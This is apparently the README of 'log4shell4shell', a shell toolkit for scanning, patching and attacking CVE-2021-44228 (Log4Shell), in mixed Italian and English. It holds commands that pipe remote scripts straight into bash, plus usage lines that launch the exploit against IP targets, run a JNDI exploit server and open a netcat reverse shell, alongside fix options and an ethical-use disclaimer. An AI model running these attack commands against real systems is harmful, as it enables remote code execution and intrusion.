
Log4shell - Multi-Toolkit. Trova, Correggi e Testa possibili vulnerabilità CVE-2021-44228 - fornisce un ambiente completo di test/attacco LOG4SHELL su shell
Log4j - Multitool. Trova & ripara possibili vulnerabilità CVE-2021-44228 - fornisce un ambiente completo di test/attacco LOG4SHELL

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
Esegui screen -r l4s4s-ldap-srv e/o screen -r l4s4s-nc-rsh per visualizzare alcune informazioni sull'attacco nella shell del server Exploit:
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm
Wrong input! Please enter one of these options:
Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
--python-scan <command>
Esegui semplicemente il mio helper-script (--list-versions): ./python-upgrader.sh
Esegui semplicemente in Powershell (modalità amministratore): .\set_windows_fix.ps1
Il progetto log4shell4shell è realizzato solo per scopi educativi e di test etici. L'uso di log4j-scan per attaccare bersagli senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di qualsiasi uso improprio o danno causato da questo programma.